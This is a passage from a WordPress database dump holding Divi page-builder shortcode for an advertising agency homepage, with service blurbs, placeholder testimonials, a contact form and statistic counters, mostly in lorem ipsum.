custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:46:28','2020-07-06 20:46:28','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(248,1,'2020-07-06 20:47:21','2020-07-06 20:47:21','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" 